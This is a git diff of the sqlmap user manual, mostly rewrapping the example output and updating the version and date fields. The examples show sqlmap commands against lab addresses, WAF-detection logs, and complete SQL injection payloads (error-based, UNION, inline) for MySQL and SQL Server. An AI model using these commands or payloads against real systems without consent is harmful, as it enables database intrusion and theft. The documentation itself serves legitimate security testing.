+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Cisco ACE XML Gateway (Cisco Sy
+    stems)'
     [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'TrafficShield (F5 Networks)'
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewall Enterprise (Teros/Citrix Systems)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Teros/Citrix Application Firewa
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai Technologies)'
+    ll Enterprise (Teros/Citrix Systems)'
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firewall (Incapsula/Imperva)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KONA Security Solutions (Akamai
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Firewall (CloudFlare)'
+    Technologies)'
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firewall (Barracuda Networks)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Incapsula Web Application Firew
+    all (Incapsula/Imperva)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'CloudFlare Web Application Fire
+    wall (CloudFlare)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Barracuda Web Application Firew
+    all (Barracuda Networks)'
     [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'webApp.secure (webScurity)'
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Security (IBM)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Proventia Web Application Secur
+    ity (IBM)'
     [xx:xx:23] [DEBUG] declared web page charset 'iso-8859-1'
     [xx:xx:23] [DEBUG] page not found (404)
     [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'KS-WAF (Knownsec)'
     [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'NetScaler (Citrix Systems)'
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewall (Jiasule)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'Jiasule Web Application Firewal
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall (AQTRONIX)'
+    l (Jiasule)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'WebKnight Application Firewall 
+    (AQTRONIX)'
     [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'AppWall (Radware)'
-    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Application Firewall (Trustwave)'
+    [xx:xx:23] [DEBUG] checking for WAF/IDS/IPS product 'ModSecurity: Open Source Web Ap
-    [xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Application Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper')
+    plication Firewall (Trustwave)'
+    [xx:xx:23] [CRITICAL] WAF/IDS/IPS identified 'ModSecurity: Open Source Web Applicati
+    on Firewall (Trustwave)'. Please consider usage of tamper scripts (option '--tamper'
+    )
     [...]
 
 ### Imitate smartphone
@@ -1968,38 +2056,51 @@ There are cases when user has a large list of potential target URLs (e.g. provid
 
 Example against a MySQL target:
 
-    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
+    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=fo\
+    o&id=1" --batch --smart
     [...]
     [xx:xx:14] [INFO] testing if GET parameter 'ca' is dynamic
     [xx:xx:14] [WARNING] GET parameter 'ca' does not appear dynamic
-    [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable
+    [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not 
+    be injectable
     [xx:xx:14] [INFO] skipping GET parameter 'ca'
     [xx:xx:14] [INFO] testing if GET parameter 'user' is dynamic
     [xx:xx:14] [WARNING] GET parameter 'user' does not appear dynamic
-    [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable
+    [xx:xx:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might no
+    t be injectable
     [xx:xx:14] [INFO] skipping GET parameter 'user'
     [xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
     [xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
     [xx:xx:14] [INFO] GET parameter 'id' is dynamic
     [xx:xx:14] [WARNING] reflective value(s) found and filtering out
-    [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
+    [xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be inje
+    ctable (possible DBMS: 'MySQL')
     [xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id'
-    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
+    heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want
-    do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
+    to skip test payloads specific for other DBMSes? [Y/n] Y
+    do you want to include all tests for 'MySQL' extending provided level (1) and risk (
+    1)? [Y/n] Y
     [xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
-    [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
+    [xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING c
+    lause' injectable 
     [xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
-    [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
+    [xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAV
+    ING clause' injectable 
     [xx:xx:14] [INFO] testing 'MySQL inline queries'
     [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
     [xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
     [xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
-    [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable 
+    [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' inject
+    able 
     [xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
-    [xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
+    [xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique
-    [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
+    tests as there is at least one other potential injection technique found
+    [xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the time
+    needed to find the right number of query columns. Automatically extending the range
+    for current UNION query injection technique test
     [xx:xx:24] [INFO] target URL appears to have 3 columns in query
-    [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
+    [xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns'
+    injectable
     [...]
 
 ### Select tests by payloads and/or titles
@@ -2010,22 +2111,28 @@ In case that you want to filter tests by their payloads and/or titles you can us
 
 Example against a MySQL target:
 
-    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW
+    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch\
+    --test-filter=ROW
     [...]
     [xx:xx:39] [INFO] GET parameter 'id' is dynamic
     [xx:xx:39] [WARNING] reflective value(s) found and filtering out
-    [xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
+    [xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be inje
+    ctable (possible DBMS: 'MySQL')
     [xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
     [xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
-    [xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause' injectable 
+    [xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or HAV
-    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+    ING clause' injectable 
+    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [
+    y/N] N
     sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
     ---
     Place: GET
     Parameter: id
         Type: error-based
         Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
-        Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
+        Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (C
+        ASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (S
+        ELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
     ---
     [...]
 
@@ -2042,11 +2149,15 @@ Example against a Microsoft SQL Server target:
         sqlmap/1.0-dev-2defc30 - automatic SQL injection and database takeover tool
         http://sqlmap.org
 
-    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual con
+    sent is illegal. It is the end user's responsibility to obey all applicable local, s
+    tate and federal laws. Developers assume no liability and are not responsible for an
+    y misuse or damage caused by this program
 
-    [*] starting at 11:25:26
+    [*] starting at xx:xx:26
 
-    Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1
+    Please enter full target URL (-u): http://192.168.21.129/sqlmap/mssql/iis/get_int.as
+    p?id=1
     POST data (--data) [Enter for None]: 
     Injection difficulty (--level/--risk). Please choose:
     [1] Normal (default)
@@ -2061,10 +2172,14 @@ Example against a Microsoft SQL Server target:
 
     sqlmap is running, please wait..
 
-    heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
+    heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Serve
-    do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1)? [Y/n] Y
+    r'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
-    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
+    do you want to include all tests for 'Microsoft SQL Server' extending provided level
-    sqlmap identified the following injection points with a total of 25 HTTP(s) requests:
+    (1) and risk (1)? [Y/n] Y
+    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [
+    y/N] N
+    sqlmap identified the following injection points with a total of 25 HTTP(s) requests
+    :
     ---
     Place: GET
     Parameter: id
@@ -2074,11 +2189,15 @@ Example against a Microsoft SQL Server target:
 
         Type: error-based
         Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
-        Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)))
+        Payload: id=1 AND 4847=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(
+    58)+(SELECT (CASE WHEN (4847=4847) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(1
+    11)+CHAR(109)+CHAR(113)+CHAR(58)))
 
         Type: UNION query
         Title: Generic UNION query (NULL) - 3 columns
-        Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) CHAR(70) CHAR(79) CHAR(118) CHAR(106) CHAR(87) CHAR(101) CHAR(119) CHAR(115) CHAR(114) CHAR(77) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58)-- 
+        Payload: id=1 UNION ALL SELECT NULL,NULL,CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100) 
+    CHAR(58)+CHAR(70)+CHAR(79)+CHAR(118)+CHAR(106)+CHAR(87)+CHAR(101)+CHAR(119)+CHAR(115
+    )+CHAR(114)+CHAR(77)+CHAR(58)+CHAR(111)+CHAR(109)+CHAR(113)+CHAR(58)-- 
 
         Type: stacked queries
         Title: Microsoft SQL Server/Sybase stacked queries
@@ -2090,7 +2209,9 @@ Example against a Microsoft SQL Server target:
 
         Type: inline query
         Title: Microsoft SQL Server/Sybase inline queries
-        Payload: id=(SELECT CHAR(58) CHAR(118) CHAR(114) CHAR(100) CHAR(58) (SELECT (CASE WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(111) CHAR(109) CHAR(113) CHAR(58))
+        Payload: id=(SELECT CHAR(58)+CHAR(118)+CHAR(114)+CHAR(100)+CHAR(58)+(SELECT (CAS
+    E WHEN (6382=6382) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(109)+CH
+    AR(113)+CHAR(58))
     ---
     web server operating system: Windows XP
     web application technology: ASP, Microsoft IIS 5.1
@@ -2107,4 +2228,4 @@ Example against a Microsoft SQL Server target:
     current database:    'testdb'
     current user is DBA:    True
 
-    [*] shutting down at 11:25:52
+    [*] shutting down at xx:xx:52

_Sidebar.md

@@ -6,7 +6,7 @@
 * [[Features]] - Brief list of supported features
 * [[Download and update]] - Keep your copy up-to-date
 * [[Dependencies]] - Information about used third-party libraries and tools
-* [[History]] - History from 2006 to 2015
+* [[History]] - History from 2006 to 2016
 * [[Usage]] - Exhaustive breakdown of all **options** and **switches** together with **examples**
 * [[License]] - Copyright information
 

generatepdf.sh

@@ -1,5 +1,5 @@
 #!/bin/sh
 
-pandoc -f markdown -o README.pdf --smart --normalize --tab-stop=4 --standalone --template=template.latex --variable version=1.0-dev --variable author-meta="sqlmap developers" --variable title-meta="sqlmap user's manual" --no-wrap --toc --highlight-style=haddock --number-sections title.txt Introduction.md Techniques.md Features.md Download-and-update.md Dependencies.md History.md Usage.md License.md
+pandoc -f markdown -o README.pdf --smart --normalize --tab-stop=4 --standalone --template=template.latex --variable version=1.0 --variable author-meta="sqlmap developers" --variable title-meta="sqlmap user's manual" --no-wrap --toc --highlight-style=haddock --number-sections title.txt Introduction.md Techniques.md Features.md Download-and-update.md Dependencies.md History.md Usage.md License.md
 
-pandoc -f markdown -o FAQ.pdf --smart --normalize --tab-stop=4 --standalone --template=template.latex --variable version=1.0-dev --variable author-meta="sqlmap developers" --variable title-meta="sqlmap frequently asked questions (FAQ)" --no-wrap --toc --highlight-style=haddock --number-sections title_faq.txt FAQ.md
+pandoc -f markdown -o FAQ.pdf --smart --normalize --tab-stop=4 --standalone --template=template.latex --variable version=1.0 --variable author-meta="sqlmap developers" --variable title-meta="sqlmap frequently asked questions (FAQ)" --no-wrap --toc --highlight-style=haddock --number-sections title_faq.txt FAQ.md

title.txt

@@ -1,3 +1,3 @@
 % sqlmap user's manual
 % [Bernardo Damele A. G.](mailto:bernardo@sqlmap.org) and [Miroslav Stampar](mailto:miroslav@sqlmap.org)
-% April 15, 2013 (**DRAFT**)
+% February 2X, 2016 (**DRAFT**)

title_faq.txt

@@ -1,3 +1,3 @@
 % sqlmap frequently asked questions (FAQ)
 % [Bernardo Damele A. G.](mailto:bernardo@sqlmap.org) and [Miroslav Stampar](mailto:miroslav@sqlmap.org)
-% April 15, 2013 (**DRAFT**)
+% February 2X, 2016 (**DRAFT**)